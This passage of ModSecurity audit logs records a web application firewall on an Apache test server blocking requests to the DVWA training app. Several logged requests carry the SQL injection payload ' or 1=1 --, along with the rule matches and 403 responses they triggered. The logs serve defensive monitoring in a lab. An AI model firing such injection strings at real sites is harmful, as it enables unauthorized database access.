[tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":408,"p2":2071,"p3":0,"p4":0,"p5":167,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:57 --0400","transaction_id":"WRc0-X8AAQEAAAkZ0BkAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":388,"p2":2109,"p3":0,"p4":0,"p5":143,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:05 --0400","transaction_id":"WRc1BX8AAQEAAAkVV4wAAAAA","remote_address":"192.168.75.145","remote_port":56806,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":661,"p2":3257,"p3":0,"p4":0,"p5":217,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJcAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:30:21 GMT","If-None-Match":"\"1d0-54f6a5695262a\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:32:22 GMT","ETag":"\"1f8-54f6a5dd13646\"","Accept-Ranges":"bytes","Content-Length":"504","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc1GX8AAQEAAAmHBJcAAAAF\"]"],"stopwatch":{"p1":652,"p2":1048,"p3":56,"p4":246,"p5":52,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJgAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1GX8AAQEAAAmHBJgAAAAF\"]"],"stopwatch":{"p1":382,"p2":921,"p3":46,"p4":245,"p5":48,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJkAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
